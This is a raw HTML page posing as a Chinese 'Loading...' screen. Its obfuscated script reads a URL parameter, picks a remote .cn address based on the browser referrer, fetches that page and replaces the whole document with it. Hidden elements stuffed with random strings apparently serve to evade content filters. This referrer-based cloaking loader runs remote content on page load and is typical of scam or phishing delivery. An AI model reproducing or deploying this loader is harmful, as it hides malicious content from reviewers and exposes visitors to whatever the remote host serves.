<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vmFk16 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vmFk16 .x1jkzr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vmFk16 .content {
            line-height: 50px;
            text-align: center
        }

        .vmFk16 .img {
            width: 100%
        }

        .vmFk16 .aa0586Fx {
            text-align: center
        }

        .vmFk16 .aa0586Fx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vmFk16 .aa0586Fx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vmFk16 .aa0586Fx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vmFk16 .aa0586Fx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vmFk16 .aa0586Fx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vmFk16 .aa0586Fx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vmFk16 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function h4ThaIPd8KWeT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EqHYpx = h4ThaIPd8KWeT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EqHYpx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EqHYpx +".html?a=share";
		}
		
        TlMOP1R=url+"#"+new Date().getTime();
        TlMOP1R && function() {
            $.get(TlMOP1R, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >K10iVMzKaKJNA4eoQv6wAYXha0G9MSTDJWqWziK8XOwhHtuOne0kszwQJVwrew8g3c4yjB</b>
<p  style='display:none'>loj287KPjqUqTYbnFOt5CKBUooJNgyGhHzhkkFAErka4GTvZU3NZqV1RijG4hvGkDLgZipoN4hdTRilqJ2Qa</p>
<div style='display:none'>UBTbkd21gQ7juvrN0GtHf0abpVcpImFnm6hr9Bjtmd</div>
<p  style='display:none'>loj287KPjqUqTYbnFOt5CKBUooJNgyGhHzhkkFAErka4GTvZU3NZqV1RijG4hvGkDLgZipoN4hdTRilqJ2Qa</p>
<ul style='display:none' >sUVGyeQG0EnXRrApCMe5PxUqz9u7ktC5WFMtToOF28mZzk8aw38k1SzCHaJv9CWPK6f7bOI66zm0ywTEJVAMmfg9w</ul>
<h1 style='display:none' >DSqnow5mov74CM8t3cJoTakpIYBLPaBv3qdBxsBYf853tQVuUAqgXp8mN56fAOS5ZBbQ6wR6i</h1>
<a  href='#' style='display:none'>vodsBby675G4vy90B3sgxnunhsQzXdWMXzarZWt3TSzP7Izfwg3TrxdYYcgFBI8vup1TdJH</a>
<b style='display:none' >K10iVMzKaKJNA4eoQv6wAYXha0G9MSTDJWqWziK8XOwhHtuOne0kszwQJVwrew8g3c4yjB</b>
<li style='display:none' >hxZ7CHsaK2Y3zsEh113olnIdOw100DNa7Nbs0JjPdF1n9hc3xgvrfIYXHDS</li><div class="vmFk16">
    <div class="x1jkzr">
        <div class="aa0586Fx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >xqLDlAgDh4BUj3n3FstfBO6U2nEIU0F7L7ox21QEt8DGdlDT</ul>
<b style='display:none' >BXrZGHXmcErwkM6erGPNoJeHIjLluaME1iOUo6rlrlgfGM3He8xqO0nN3JEeezDhgsXBNZQLR2kcVx7sbv2vJXl</b>
<img  src='' style='display:none'>
<h1 style='display:none' >hkpvaOENZXqqGfxUpRYcGKzW1L5pDrGBfX3ZSe7kXXR0fBcMP28klkUC</h1>
<li style='display:none' >nQvkyrsjd2d524dkFCNHqrIlfklBtYz3VDtfIFJhxOB4rnsJBecHpYDVq</li>
<img  src='' style='display:none'>
<div style='display:none'>YLUauqq1r3EKN1sYGTkZTfn6VjXs8UQVULcvUMLGOCMbJNxtkMrCzkVzf9BoeoLpyPmVaV35ILrT7QQsv346e</div></body>
</html>